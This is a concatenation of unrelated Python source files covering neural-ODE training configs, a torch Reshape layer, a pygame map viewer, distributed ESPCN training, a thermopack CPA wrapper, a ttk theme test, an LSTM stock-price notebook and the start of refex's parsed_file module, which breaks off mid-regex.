        'plot': [True],
        'paths_to_plot': [(0, 1, 2, 3, 4,)],
        'evaluate': [True],
    }
    params_list1 = get_parameter_array(param_dict=param_dict1)
    params_list += params_list1
    # #3: parallel training
    # print('combinations: {}'.format(len(params_list)))
    # nb_jobs = min(N_JOBS, len(params_list))
    # print('nb_jobs: {}'.format(nb_jobs))
    # parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
    #                   first_id=501)

    # ==========================================================================
    # parallel training on physionet dataset
    # ==========================================================================
    # ---------- means and stds over multiple runs ---------
    path = '{}saved_models_physionet_comparison/'.format(train.data_path)
    network_size = [50, 200]
    ode_nn = [((size, 'tanh'), (size, 'tanh')) for size in network_size]
    params_list = []
    for _ode_nn in ode_nn:
        param_dict = {
            'epochs': [175],
            'batch_size': [50],
            'save_every': [1],
            'learning_rate': [0.001],
            'hidden_size': [41],
            'bias': [True],
            'dropout_rate': [0.1],
            'ode_nn': [_ode_nn],
            'readout_nn': [_ode_nn],
            'enc_nn': [_ode_nn],
            'use_rnn': [False],
            'solver': ["euler"],
            'weight': [0.5],
            'weight_decay': [1.],
            'dataset': ["physionet"],
            'quantization': [0.016],
            'n_samples': [8000],
            'saved_models_path': [path],
        }
        params_list1 = get_parameter_array(param_dict=param_dict)
        params_list += params_list1
    # params_list = params_list * 5
    # #2: parallel training
    # print('combinations: {}'.format(len(params_list)))
    # nb_jobs = min(N_JOBS, len(params_list))
    # print('nb_jobs: {}'.format(nb_jobs))
    # parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
    #                   first_id=1, saved_models_path=path)

    # ==========================================================================
    # parallel training for sine stock models
    # ==========================================================================
    # # 1: create datasets
    # if data_utils._get_time_id('sine_BlackScholes') is None:
    #     mn = "sine_BlackScholes"
    #     for sc in [2 * np.pi, 4 * np.pi]:
    #         print('create sine dataset: model={}, '
    #               'sine_coeff={}'.format(mn, sc))
    #         hd = copy.deepcopy(data_utils.hyperparam_default)
    #         hd['sine_coeff'] = sc
    #         hd['nb_paths'] = 20000
    #         data_utils.create_dataset(mn, hd)
    # 2: load the datasets
    df_overview, filename = data_utils.get_dataset_overview()
    data_names = []
    data_ids = []
    for index, row in df_overview.iterrows():
        if 'sine_' in row['name']:
            data_names.append(row['name'])
            data_ids.append(row['id'])
    # 3: define hyper params
    path = '{}saved_models_sine/'.format(train.data_path)
    params_list = []
    # NOTE(review): this assignment is immediately clobbered by the loop below,
    # which iterates over the physionet ``ode_nn`` list (sizes 50 and 200) —
    # confirm whether the (400, 'tanh') network was meant to be used.
    _ode_nn = ((400, 'tanh'), (400, 'tanh'))
    for dat_name, dat_id in zip(data_names, data_ids):
        for _ode_nn in ode_nn:
            param_dict1 = {
                'epochs': [100],
                'batch_size': [100],
                'save_every': [10],
                'learning_rate': [0.001],
                'test_size': [0.2],
                'seed': [398],
                'hidden_size': [10],
                'bias': [True],
                'dropout_rate': [0.1],
                'ode_nn': [_ode_nn],
                'readout_nn': [_ode_nn],
                'enc_nn': [_ode_nn],
                'use_rnn': [False],
                'func_appl_X': [[]],
                'solver': ["euler"],
                'weight': [0.5],
                'weight_decay': [1.],
                'dataset': [dat_name],
                'dataset_id': [dat_id],
                'plot': [True],
                'paths_to_plot': [(0, 1, 2, 3, 4,)],
                'evaluate': [True],
                'saved_models_path': [path],
            }
            params_list1 = get_parameter_array(param_dict=param_dict1)
            params_list += params_list1
    # # #3: parallel training
    # print('combinations: {}'.format(len(params_list)))
    # nb_jobs = min(N_JOBS, len(params_list))
    # print('nb_jobs: {}'.format(nb_jobs))
    # parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
    #                   first_id=1, saved_models_path=path)
|
import torch
from .Module import Module
from .utils import clear
class Reshape(Module):
    """Reshape the non-batch dimensions of the input to a fixed target size.

    ``Reshape(2, 3)`` — or equivalently ``Reshape(torch.Size([2, 3]))`` —
    turns an input of shape ``(B, ...)`` whose trailing dimensions hold
    6 elements into a view of shape ``(B, 2, 3)``.
    """

    def __init__(self, *args):
        super(Reshape, self).__init__()
        # BUG FIX: the original condition was `len(args) == 0 and
        # isinstance(args[0], torch.Size)`, which could never take the
        # torch.Size branch (and would raise IndexError if it ever did):
        # a single torch.Size argument means len(args) == 1.
        if len(args) == 1 and isinstance(args[0], torch.Size):
            self.size = args[0]
        else:
            self.size = torch.Size(args)
        # Total number of elements per sample in the target shape.
        self.nelement = 1
        for s in self.size:
            self.nelement *= s
        # Scratch buffers used to make non-contiguous tensors contiguous
        # before taking a view (view requires contiguity).
        self._input = None
        self._gradOutput = None

    def updateOutput(self, input):
        """Return a view of `input` reshaped to (batch, *self.size)."""
        if not input.is_contiguous():
            # Copy into a contiguous scratch tensor so .view() is legal.
            if self._input is None:
                self._input = input.new()
            self._input.resize_as_(input)
            self._input.copy_(input)
            input = self._input
        batchsize = [input.size(0)] + list(self.size)
        self.output = input.view(torch.Size(batchsize))
        return self.output

    def updateGradInput(self, input, gradOutput):
        """Reshape `gradOutput` back to the shape of `input`."""
        if not gradOutput.is_contiguous():
            if self._gradOutput is None:
                self._gradOutput = gradOutput.new()
            self._gradOutput.resize_as_(gradOutput)
            self._gradOutput.copy_(gradOutput)
            gradOutput = self._gradOutput
        self.gradInput = gradOutput.view_as(input)
        return self.gradInput

    def __repr__(self):
        return super(Reshape, self).__repr__() + \
            '({})'.format('x'.join(map(lambda x: str(x), self.size)))

    def clearState(self):
        # Drop the contiguity scratch buffers to free memory.
        clear(self, '_input', '_gradOutput')
        return super(Reshape, self).clearState()
|
from vis_dataclasses import load_image_file_zipped
from pathlib import Path
from typing import Tuple
from dataclasses import dataclass
from PIL import Image
import pygame
import numpy as np
import rasterio as rio
def pil_image_to_surface(im):
    """Convert a PIL image into a pygame surface of the same size and mode."""
    raw_bytes = im.tobytes()
    return pygame.image.fromstring(raw_bytes, im.size, im.mode)
def write_colour_to_screen(screen, array):
    """Blit an RGB numpy array onto the pygame screen at the origin."""
    surface = pil_image_to_surface(Image.fromarray(array))
    screen.blit(surface, (0, 0))
def write_greyscale_to_screen(screen, greyscale_data):
    """Rescale greyscale data into 0-255, convert to RGB and blit at the origin."""
    normalised = np.copy(greyscale_data)
    # Shift so the minimum sits at zero, then floor-divide down to 0-255.
    normalised = normalised - normalised.min()
    normalised = normalised // (normalised.max() / 255)
    rgb_image = Image.fromarray(normalised).convert('RGB')
    screen.blit(pil_image_to_surface(rgb_image), (0, 0))
def calculate_scale_ratio(screen_size, image):
    """Return the smallest screen/image ratio across both dimensions.

    NOTE(review): ``screen_size`` is iterated in reverse before being zipped
    against ``image.size``; elsewhere in this file ``screen_size[0]`` is used
    as a width, so this pairs screen height with image width — confirm this
    axis ordering is intentional before relying on it.
    """
    ratios = [
        screen_dim / image_dim
        for screen_dim, image_dim in zip(reversed(screen_size), image.size)
    ]
    return min(ratios)
class VisSettings:
    """Static configuration for the visualisation: loaded images, scaling,
    framerate and selection-rectangle styling."""

    def __init__(
        self,
        screen_size: Tuple[int, int],
        framerate: int = 165,
        selection_line_width: int = 3,
        selection_line_colour: Tuple[int, int, int] = (0, 204, 51),
    ):
        """Load the full-size and preview images and precompute scale ratios.

        Args:
            screen_size: (width, height) of the pygame window.
            framerate: target frames per second for the main loop.
            selection_line_width: pixel width of the selection rectangle.
            selection_line_colour: RGB colour of the selection rectangle.
        """
        print("Loading data...")
        self.screen_size = screen_size
        self.pil_colour_image = load_image_file_zipped(str(Path(__name__).absolute().parent.parent.joinpath("tasmania", "colour.tif")))
        self.pil_small_colour_image = load_image_file_zipped(str(Path(__name__).absolute().parent.parent.joinpath("tasmania", "colour_small.png")))
        self.full_size_dimensions = self.pil_colour_image.size
        self.scale_ratio = calculate_scale_ratio(self.screen_size, self.pil_colour_image)
        small_image_scale_ratio = calculate_scale_ratio(self.screen_size, self.pil_small_colour_image)
        resized_dimensions = (
            small_image_scale_ratio * self.pil_small_colour_image.size[0],
            small_image_scale_ratio * self.pil_small_colour_image.size[1],
        )
        self.pil_small_colour_image.thumbnail(resized_dimensions, Image.ANTIALIAS)
        # BUG FIX: Image.crop returns a *new* image rather than cropping in
        # place; the original call discarded the result, so the preview was
        # never actually cropped to the screen size.
        self.pil_small_colour_image = self.pil_small_colour_image.crop(
            (0, 0, self.screen_size[0], self.screen_size[1])
        )
        self.pygame_colour_image = pil_image_to_surface(self.pil_small_colour_image)
        self.framerate = framerate
        self.selection_line_width = selection_line_width
        self.selection_line_colour = selection_line_colour
        print("Finished loading.")

    def get_image_window(self, left, top, mode="colour"):
        """Read a screen-sized window from the full-resolution rasters.

        Args:
            left, top: top-left pixel of the window in the full raster.
            mode: "colour" returns an RGB pygame surface; "numpy" returns the
                raw height data as a numpy array; any other value returns the
                heights normalised to greyscale as a pygame surface.
        """
        if mode == "colour":
            path = str(Path(__name__).absolute().parent.parent.joinpath("tasmania", "colour.tif"))
        else:
            path = str(Path(__name__).absolute().parent.parent.joinpath("tasmania", "heights.tif"))
        with rio.open(path) as rio_src:
            w = rio.windows.Window(left, top, self.screen_size[0], self.screen_size[1])
            if mode == "colour":
                # Assemble the three colour bands into an HxWx3 uint8 array.
                loaded_data = np.zeros((self.screen_size[1], self.screen_size[0], 3), "uint8")
                loaded_data[..., 0] = rio_src.read(1, window=w)
                loaded_data[..., 1] = rio_src.read(2, window=w)
                loaded_data[..., 2] = rio_src.read(3, window=w)
                im = Image.fromarray(loaded_data)
            else:
                loaded_data = rio_src.read(1, window=w)
                if mode == "numpy":
                    return loaded_data
                # Normalise heights into 0-255 for display.
                loaded_data = loaded_data - loaded_data.min()
                loaded_data = loaded_data // (loaded_data.max() / 255)
                im = Image.fromarray(loaded_data).convert('RGB')
        return pil_image_to_surface(im)
@dataclass
class VisState:
    """Mutable runtime state shared across the visualisation loop."""
    running: bool = True  # main-loop flag; set False to exit the program
    within_transition: bool = True  # True while an animated transition plays
    resized_image_position: Tuple[int, int] = (0, 0)  # blit offset of the preview image
    rectangle_bounds: Tuple = None  # current selection rectangle, if any
    scaled_location: Tuple = None  # selection mapped to full-image coordinates
|
"""
Time Complexity: O(1)
Space Complexity: O(1)
"""
"""
Time Complexity: O(n)
Space Complexity: O(1)
"""
def sum_n_natural_numbers(n: int) -> int:
    """Return 1 + 2 + 3 + ... + n.

    Uses Gauss' closed-form formula n*(n+1)/2, so it runs in O(1) time and
    O(1) space (the previous loop version was O(n) time).
    For n <= 0 the sum is empty, so 0 is returned.
    """
    if n <= 0:
        return 0
    return n * (n + 1) // 2
# Demonstrate the function on a handful of sample inputs.
for sample in (10, 3, 0, 5, 4):
    print(sum_n_natural_numbers(sample))
|
import tensorflow as tf
import numpy as np
import math
import time
import os
import glob
import cv2
import datetime
import scipy as sp
from model_v2 import ESPCN
from utils import (
input_setup,
checkpoint_dir,
read_data,
checkimage,
imsave,
imread,
load_data,
preprocess,
modcrop
)
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_integer("epoch", 250, "Number of epoch")
flags.DEFINE_integer("steps_per_epoch", 250, "Steps per epoch")
flags.DEFINE_integer("image_size", 32, "The size of image input")
flags.DEFINE_integer("c_dim", 3, "The size of channel")
flags.DEFINE_boolean("is_train", True, "if training")
flags.DEFINE_integer("train_mode", 1, "0: Spatial Transformer 1: VESPSCN No MC\
2: VESPCN 3: Bicubic (No Training Required) 4: SRCNN \
5: Multi-Dir mode for testing mode 2 6: Multi-Dir mode \
for testing mode 1")
flags.DEFINE_integer("scale", 3,
"the size of scale factor for pre-processing input image")
flags.DEFINE_integer("stride", 100, "the size of stride")
flags.DEFINE_string("checkpoint_dir", "checkpoint",
"Name of checkpoint directory")
flags.DEFINE_float("learning_rate", 1e-4, "The learning rate")
flags.DEFINE_integer("batch_size", 8, "the size of batch")
flags.DEFINE_string("result_dir", "result", "Name of result directory")
flags.DEFINE_string("test_img", "", "test_img")
flags.DEFINE_boolean("load_existing_data", True,
"True iff existing hf data is loaded for training/testing")
flags.DEFINE_string("job_name", "", "ps/worker")
flags.DEFINE_integer("task_index", 0, "task index")
flags.DEFINE_string("ps_hosts", "", "ps-task hosts in cluster")
flags.DEFINE_string("worker_hosts", "", "worker-task hosts in cluster")
def prepare_data(config):
    """Load (optionally generate) training data and wrap it in input queues.

    Returns batched tensors from tf.train.batch:
      - train_mode == 2: (curr_prev_batch, curr_next_batch, label_batch)
      - otherwise:       (input_batch, label_batch)

    NOTE(review): the body mixes `config` and the module-level `FLAGS`
    (e.g. FLAGS.train_mode vs config.c_dim) — they are presumably the same
    object, but confirm before refactoring.
    """
    # Prepares data if load_existing_data is False
    if not config.load_existing_data:
        input_setup(config)
    # Loads data from data_dir
    print('Loading data...')
    data_dir = checkpoint_dir(config)
    input_, label_, paths_ = read_data(data_dir, config)
    # Shuffles training data
    print('Shuffling data...')
    numData = np.arange(input_.shape[0])
    np.random.shuffle(numData)
    input_ = input_[numData]
    label_ = label_[numData]
    # Prepares frame sets for feeding into different spatial
    # transformers if training mode is 2
    if FLAGS.train_mode == 2:
        print("Preparing frames sets for spatial transformers...")
        # Channel layout: [current | previous | next] frames, c_dim channels each.
        curr_prev_imgs = input_[:, :, :, 0:(2 * config.c_dim)]
        curr_next_imgs = np.concatenate((input_[:, :, :,
                                                0:config.c_dim],
                                         input_[:, :, :,
                                                (2 * config.c_dim):
                                                (3 * config.c_dim)]),
                                        axis=3)
        curr_prev_imgs = tf.cast(curr_prev_imgs, tf.float32)
        curr_next_imgs = tf.cast(curr_next_imgs, tf.float32)
        label_ = tf.cast(label_, tf.float32)
        # Provides data in batch one at a time to tf.train.batch
        input_queue = tf.train.slice_input_producer([curr_prev_imgs, curr_next_imgs, label_], shuffle=False)
        x1, x2, y = tf.train.batch(input_queue, batch_size=FLAGS.batch_size)
        return x1, x2, y
    elif FLAGS.train_mode == 4:
        # Upscales input data using bicubic interpolation
        # (SRCNN operates on pre-upscaled inputs).
        print('Upscaling training data using Bicubic Interpolation...')
        input_new = []
        for i in range(len(input_)):
            input_new.append(sp.misc.imresize(input_[i],
                             (config.image_size * config.scale,
                              config.image_size * config.scale), interp='bicubic'))
        input_ = np.array(input_new)
        input_ = tf.cast(input_, tf.float32)
        label_ = tf.cast(label_, tf.float32)
        # Provides data in batch one at a time to tf.train.batch
        input_queue = tf.train.slice_input_producer([input_, label_], shuffle=False)
        x1, y = tf.train.batch(input_queue, batch_size=FLAGS.batch_size)
        return x1, y
    else:
        input_ = tf.cast(input_, tf.float32)
        label_ = tf.cast(label_, tf.float32)
        # Provides data in batch one at a time to tf.train.batch
        input_queue = tf.train.slice_input_producer([input_, label_], shuffle=False)
        x1, y = tf.train.batch(input_queue, batch_size=FLAGS.batch_size)
        return x1, y
def stop_fn(step_context):
    """step_fn for MonitoredSession.run_step_fn: request an immediate stop."""
    # Delegate to the session context; the hook machinery performs the shutdown.
    step_context.request_stop()
def run_train_epochs(cfg, espcn, server):
    """Run the training loop inside a MonitoredTrainingSession.

    Args:
        cfg: tf.ConfigProto session configuration.
        espcn: ESPCN model wrapper exposing `train` and `global_step`.
        server: cluster helper exposing `target`, `task_index`, and the
            optional done-queue coordination ops.
    """
    # Stop after steps_per_epoch plus slack for the done-queue handshake ops.
    hooks = [tf.train.StopAtStepHook(last_step=(FLAGS.steps_per_epoch +
             (len(server.enqueue_ops)*len(server.resource_dict['worker'])) + 1)),
             tf.train.CheckpointSaverHook(checkpoint_dir=FLAGS.checkpoint_dir, save_steps=50, saver=tf.train.Saver())]
    # hooks = []
    # The MonitoredTrainingSession takes care of session initialization,
    # restoring from a checkpoint, saving to a checkpoint, and closing when done
    # or an error occurs.
    # master="grpc://" + worker_hosts[FLAGS.task_index]
    # is_chief: the task with task_index 0 is the chief, responsible for
    # variable initialization, checkpointing, summaries, and recovery.
    # Each worker runs the training ops; one worker is the chief, which in
    # addition to computing backpropagation also writes logs and saves the model.
    print("chkpt dir: {}".format(FLAGS.checkpoint_dir))
    print("hks: {}".format(hooks))
    print("cgf: {}".format(cfg))
    print("tsk indx T/F: {}".format(FLAGS.task_index == 0))
    #os.chdir('C:\\Users\\XL\\Desktop\\spyn-poc')
    #print("current dir: " + os.getcwd())
    #checkpoint_path = os.path.join(os.getcwd(), r'\checkpoint')
    #print("Checkpoint path: {}".format(checkpoint_path))
    # checkpoint_dir=None because the CheckpointSaverHook above handles saving.
    with tf.train.MonitoredTrainingSession(checkpoint_dir=None,
                                           hooks=hooks,
                                           master=server.target,
                                           config=cfg,
                                           is_chief=(server.task_index == 0)
                                           ) as sess:
        while not sess.should_stop() and tf.train.global_step(sess, espcn.global_step) < FLAGS.steps_per_epoch:
            espcn.train(FLAGS, sess)
        if server.use_done_queues:
            # Tell the parameter servers this worker has finished.
            server.signal_done(sess)
        sess.run_step_fn(stop_fn)
    #print('Final step: {}'.format(tf.train.global_step(sess, espcn.global_step)))
def run_ps(server):
    """Run a parameter-server task: block forever serving variables to workers."""
    server.join()
def run_worker(server):
    """Run a worker task: validate flags, build the model, and train.

    Exits with status 1 if a testing-only train_mode is combined with
    is_train=True.
    """
    # Checks if train mode is 3 and training is on
    if FLAGS.train_mode == 3 and FLAGS.is_train:
        print('Error: Bicubic Mode does not require training')
        exit(1)
    elif FLAGS.train_mode == 5 and FLAGS.is_train:
        print('Error: Multi-Dir testing mode for Mode 2 does not require training')
        exit(1)
    elif FLAGS.train_mode == 6 and FLAGS.is_train:
        print('Error: Multi-Dir testing mode for Mode 1 does not require training')
        exit(1)
    # Place the graph on this worker's device (variables go to the ps tasks).
    with tf.device(server.device):
        print(server.device)
        print(FLAGS.train_mode)
        # Prepares data based on is_train and train_mode
        DataList = []
        if FLAGS.train_mode == 2:
            # Mode 2 feeds two frame pairs plus labels (see prepare_data).
            xx1, xx2, yy = prepare_data(FLAGS)
            DataList = [xx1, xx2, yy]
        else:
            xx1, yy = prepare_data(FLAGS)
            DataList = [xx1, yy]
        espcn = ESPCN(
            image_size=FLAGS.image_size,
            is_train=FLAGS.is_train,
            train_mode=FLAGS.train_mode,
            scale=FLAGS.scale,
            c_dim=FLAGS.c_dim,
            batch_size=FLAGS.batch_size,
            load_existing_data=FLAGS.load_existing_data,
            device=server.device,
            learn_rate=FLAGS.learning_rate,
            data_list=DataList)
    if server.use_done_queues:
        # Register the done-queue handshake ops used to shut down the ps tasks.
        server.prepare_signal_ops()
    # Set log_device_placement to record which device each op/tensor is
    # assigned to (left off here to reduce log noise).
    config = tf.ConfigProto(
        allow_soft_placement=True,
        log_device_placement=False,
        device_filters=["/job:ps", "/job:worker/task:%d" % FLAGS.task_index]
    )
    run_train_epochs(config, espcn, server)
|
# Support for python2
from __future__ import print_function
# Import ctypes
from ctypes import *
# Importing Numpy (math, arrays, etc...)
import numpy as np
# Import platform to detect OS
from sys import platform, exit
# Import os utils
from os import path
# Import thermo
from . import thermo
from . import cubic
c_len_type = thermo.c_len_type
class cpa(cubic.cubic):
    """
    Interface to cubic plus association model
    """
    def __init__(self):
        """
        Initialize cubic specific function pointers
        """
        # Load dll/so
        super(cpa, self).__init__()
        # Init methods
        # Resolve the Fortran-exported symbols once; argtypes/restype are
        # assigned at call time in the methods below.
        self.eoslibinit_init_cpa = getattr(self.tp, self.get_export_name("eoslibinit", "init_cpa"))
        # Tuning methods
        self.s_get_kij = getattr(self.tp, self.get_export_name("saft_interface", "cpa_get_kij"))
        self.s_set_kij = getattr(self.tp, self.get_export_name("saft_interface", "cpa_set_kij"))
    #################################
    # Init
    #################################
    def init(self, comps, eos="SRK", mixing="vdW", alpha="Classic",
             parameter_reference="Default"):
        """Initialize cubic plus association model in thermopack
        Args:
            comps (str): Comma separated list of component names
            eos (str, optional): Cubic equation of state. Defaults to "SRK".
            mixing (str, optional): Mixture model. Defaults to "vdW".
            alpha (str, optional): Alpha model. Defaults to "Classic".
            parameter_reference (str, optional): Which parameters to use?. Defaults to "Default".
        """
        # Fortran string arguments are passed as (char*, ..., length, ...):
        # all the char pointers first, then the hidden length arguments, in
        # the same order — keep the argtypes list and the call in sync.
        eos_c = c_char_p(eos.encode('ascii'))
        eos_len = c_len_type(len(eos))
        mixing_c = c_char_p(mixing.encode('ascii'))
        mixing_len = c_len_type(len(mixing))
        alpha_c = c_char_p(alpha.encode('ascii'))
        alpha_len = c_len_type(len(alpha))
        comp_string_c = c_char_p(comps.encode('ascii'))
        comp_string_len = c_len_type(len(comps))
        ref_string_c = c_char_p(parameter_reference.encode('ascii'))
        ref_string_len = c_len_type(len(parameter_reference))
        self.eoslibinit_init_cpa.argtypes = [c_char_p,
                                             c_char_p,
                                             c_char_p,
                                             c_char_p,
                                             c_char_p,
                                             c_len_type,
                                             c_len_type,
                                             c_len_type,
                                             c_len_type,
                                             c_len_type]
        self.eoslibinit_init_cpa.restype = None
        self.eoslibinit_init_cpa(comp_string_c,
                                 eos_c,
                                 mixing_c,
                                 alpha_c,
                                 ref_string_c,
                                 comp_string_len,
                                 eos_len,
                                 mixing_len,
                                 alpha_len,
                                 ref_string_len)
        # Component count: accept either space- or comma-separated lists.
        # NOTE(review): for a list like "A, B" both splits yield 2, but mixed
        # separators may over/under-count — confirm against the caller's format.
        self.nc = max(len(comps.split(" ")),len(comps.split(",")))
    def get_kij(self, c1, c2):
        """Get attractive energy interaction parameter
        Args:
            c1 (int): Component one
            c2 (int): Component two
        Returns:
            kij (array_like): i-j interaction parameter (2 parameters)
        """
        c1_c = c_int(c1)
        c2_c = c_int(c2)
        # Output buffer: the library writes two doubles into kij_c.
        kij_c = (c_double * 2)(0.0)
        self.s_get_kij.argtypes = [POINTER(c_int),
                                   POINTER(c_int),
                                   POINTER(c_double)]
        self.s_get_kij.restype = None
        self.s_get_kij(byref(c1_c),
                       byref(c2_c),
                       kij_c)
        return np.array(kij_c)
    def set_kij(self, c1, c2, kij):
        """Set attractive energy interaction parameter
        Args:
            c1 (int): Component one
            c2 (int): Component two
            kij (array_like): i-j interaction parameter (2 parameters)
        """
        c1_c = c_int(c1)
        c2_c = c_int(c2)
        kij_c = (c_double * 2)(*kij)
        self.s_set_kij.argtypes = [POINTER(c_int),
                                   POINTER(c_int),
                                   POINTER(c_double)]
        self.s_set_kij.restype = None
        self.s_set_kij(byref(c1_c),
                       byref(c2_c),
                       kij_c)
|
"""
Author: RedFantom
License: GNU GPLv3
Copyright (c) 2017-2018 RedFantom
"""
import sys
from unittest import TestCase
from ttkthemes import ThemedTk
from tkinter import ttk
def printf(string, end="\n"):
    """Write directly to the real stdout (bypassing redirection) and flush."""
    real_stdout = sys.__stdout__
    real_stdout.write(string + end)
    real_stdout.flush()
class TestThemedWidgets(TestCase):
    """
    Tkinter may crash if widgets are not configured properly in a theme.
    Therefore, in addition to checking if all files for a theme exist
    by loading it, this Test also tests every core ttk widget to see
    if the widget can be successfully created with the theme data.
    When Tkinter crashes, it keeps the Global Interpreter Lock in place,
    so the program actually has to be terminated with SIGTERM.
    Therefore, this test only executes on UNIX.
    """
    # Core ttk widget class names instantiated for every theme.
    WIDGETS = [
        "Label",
        "Treeview",
        "Button",
        "Frame",
        "Notebook",
        "Progressbar",
        "Scrollbar",
        "Scale",
        "Entry",
        "Combobox"
    ]
    def setUp(self):
        # A ThemedTk window is needed to enumerate the available themes.
        self.window = ThemedTk()
    def test_widget_creation(self):
        """Create every widget under every theme, guarded by a 5s alarm."""
        try:
            import signal
        except ImportError:
            pass
        # signal.alarm only exists on UNIX; skip silently elsewhere.
        if "signal" not in locals() or not hasattr(signal, "alarm"):
            return
        for theme in self.window.themes:
            self.window.set_theme(theme)
            for widget in self.WIDGETS:
                # Fresh window per widget so a crash doesn't poison the rest.
                window = ThemedTk(theme=theme)
                # SIGALRM terminates the process if Tk hangs holding the GIL.
                signal.alarm(5)
                printf("Testing {}: {}".format(theme, widget), end=" - ")
                getattr(ttk, widget)(window).pack()
                window.update()
                window.destroy()
                signal.alarm(0)
                printf("SUCCESS")
    def tearDown(self):
        self.window.destroy()
|
# -*- coding: utf-8 -*-
"""
# Deep Learning - Recurrent Neural Networks
Implementation of a simple LSTM network that tries to estimate the google stock prices given a sequence of data.
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
"""## 1. Import your datasets train and test """
# Load the train/test CSVs (must be present in the working directory).
train = pd.read_csv('trainset.csv')
train.head()
test = pd.read_csv('testset.csv')
test.head()
"""## 2. Separate your open column and store it in a variable.
Training can only be done on numpy arrays, therefore we have to transform the dataframe into a numpy array.
"""
# Seperating the col and changing it to a numpy array and resizing it
training = train['Open'].to_numpy().reshape(-1, 1)
type(training)
"""## 3. Use a MaxMinScaler and scale your data to a range of 0-1."""
# import
from sklearn.preprocessing import MinMaxScaler
# initialize
scaler = MinMaxScaler(feature_range=(0,1))
# Scale the data
training_scaled = scaler.fit_transform(training)
training_scaled
"""## 4. Create empty arrays for x, y of train and test set.
We will use windows of 60 timestaps to predict the 61st sample. Use a for loop, that ranges to length of training or testing file. Every 60 sample, append to your training set.
Keep in mind that labels:
x_train.append(training_scaled[i-60:i, 0])
y_train.append(training_scaled[i,0])
"""
# Sliding window: each sample is the 60 previous prices, the label is price 61.
x_train = []
y_train = []
for i in range(60, len(training_scaled)):
    x_train.append(training_scaled[i-60:i, 0])
    y_train.append(training_scaled[i,0])
x_train, y_train = np.array(x_train), np.array(y_train)
"""## 5. reshape your data such that it has space for another set of features. """
# LSTM expects (samples, timesteps, features); add a singleton feature axis.
x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))
x_train.shape
"""**Training and testing files should be ready** """
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
"""## 6. Create a regressor model that has the following structure.

"""
# Stacked LSTM regressor: four LSTM layers of 50 units with 20% dropout,
# followed by a single-unit dense output (next-day price).
model = Sequential()
model.add(LSTM(units=50, return_sequences=True, input_shape=(60, 1)))
model.add(Dropout(0.2))
model.add(LSTM(units=50, return_sequences=True))
model.add(Dropout(0.2))
model.add(LSTM(units=50, return_sequences=True))
model.add(Dropout(0.2))
model.add(LSTM(units=50))
model.add(Dropout(0.2))
model.add(Dense(units=1))
"""## 7. Compile your model using the adam optimizer and set your losses for 'mean_squared_error'. and fit your data with 75 epochs."""
model.compile(optimizer='adam', loss='mean_squared_error')
print(model.summary())
model.fit(x_train, y_train, epochs=75)
"""## 8. Concatenate your train['open'] and test['open'] with axis =0.
"""
testing = test['Open'].to_numpy().reshape(-1, 1)
# BUG FIX: train must come first (the original concatenated test before
# train, so the slice below did not line up with the test period).
concat_open = pd.concat((train['Open'], test['Open']), axis=0)
"""## 9. Make sure your inputs start from index 60. reshape them into a single column and apply the scaler transform. """
# BUG FIX: derive the window start from the data lengths instead of the
# hard-coded 1259, and reuse the scaler fitted on the *training* data
# (transform, not fit_transform) so test statistics don't leak into scaling.
inputs = concat_open[len(concat_open) - len(testing) - 60:].to_numpy().reshape(-1, 1)
inputs = scaler.transform(inputs)
inputs
"""## 10. Refer to step 4, if you have completed it for x_test move to step 11, else append your data in x_test in the same way. """
x_test = []
for i in range(60, len(inputs)):
    x_test.append(inputs[i-60:i, 0])
"""## 11. Convert to a numpy array and reshape similar to step 5."""
x_test = np.array(x_test)
x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))
x_test.shape
"""## 12. Predict your results and plot them against the real values."""
pred = model.predict(x_test)
# undo the transformation by inverse-transforming since we need it in the original form
pred = scaler.inverse_transform(pred)
plt.plot(testing, label='Stock Price')
plt.plot(pred, label='Prediction')
plt.xlabel('Time')
plt.ylabel('Stock price')
plt.legend()
plt.show()
|
from .subcmd import SubCmd
class ResumeCmd(SubCmd):
    """CLI subcommand stub for resuming a previously stopped crawler job."""
    def add_parser(self, subparser):
        """Register the ``resume`` subcommand and its ``id`` argument."""
        self.parser = subparser.add_parser('resume', help='Resume a previously stopped job')
        self.parser.add_argument(
            'id',
            help='ID of crawler job'
        )
    def execute(self, args):
        # Not implemented yet; callers should expect NotImplementedError.
        raise NotImplementedError()
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`refex.parsed_file`
------------------------
"""
# No portable raw unicode literal exists without unicode_literals.
# see https://stackoverflow.com/questions/33027281
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import re
from typing import Iterable, Mapping, Optional
import asttokens
import attr
import cached_property
@attr.s(frozen=True, eq=True, order=False)
class ParsedFile(object):
  """A wrapper for a file after preprocessing.
  May be subclassed.
  The base class contains common metadata and does not in fact represent the
  result of any parsing. Individual subclasses may contain detailed data about
  the structure of a file. (See, for example,
  :class:`refex.python.matcher.PythonParsedFile`)
  Attributes:
    text: The unparsed file contents.
    path: The path to the file.
    pragmas: The pragmas for this file, in file order.
    line_numbers: A cache for line number <-> codepoint offset conversion.
  """
  text = attr.ib(type=str)
  path = attr.ib(type=str)
  pragmas = attr.ib(type=Iterable["Pragma"])

  # Computed lazily and memoized; safe because the class is frozen.
  @cached_property.cached_property
  def line_numbers(self):
    return asttokens.LineNumbers(self.text)
# Matches a trailing pragma in a piece of text in an re.search.
_PRAGMA_RE = re.compile(
r"""
# Match only at the boundary (like \b) for words-including-dashes.
# We'd use lookbehind, but this isn't a fixed-width pattern.
(?:[^-\w]|\A)
(?P<tag>[-\w]+)\s*
:
\s*
(?P<data>
[-\w]+\s*=\s*[-\w.]+\s* # key=value
(?:,\s* [-\w]+ \s* = \s* [-\w.]+ \s*)*
)
